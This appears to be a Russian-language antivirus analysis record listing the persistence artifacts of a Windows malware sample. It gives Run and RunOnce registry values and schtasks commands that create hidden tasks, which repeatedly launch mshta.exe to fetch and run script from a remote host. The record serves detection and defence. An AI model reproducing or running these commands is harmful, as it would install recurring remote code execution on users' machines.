Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'SystemBoot' = 'mshta.exe http://374.wmelon819.info/pcsz/reg2.php?cccid=&log=1'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'RegWrite' = 'mshta.exe http://374.wmelon819.info/pcsz/set_inf2.php?cccid='
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'RegWrite' = 'mshta.exe http://374.wmelon819.info/pcsz/set_inf2.php?cccid='
- <SYSTEM32>\tasks\systemboot
- <SYSTEM32>\tasks\regwrite
- '%WINDIR%\syswow64\schtasks.exe' /create /tn SystemBoot /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/reg2.php?cc##### /sc MINUTE /mo 3' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /tn RegWrite /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/set_inf2.php?cc##### /sc MINUTE /mo 10' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /tn SystemBoot /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/reg2.php?cc##### /sc MINUTE /mo 3
- '%WINDIR%\syswow64\schtasks.exe' /create /tn RegWrite /f /tr "<SYSTEM32>\mshta.exe http://37#.##elon819.info/pcsz/set_inf2.php?cc##### /sc MINUTE /mo 10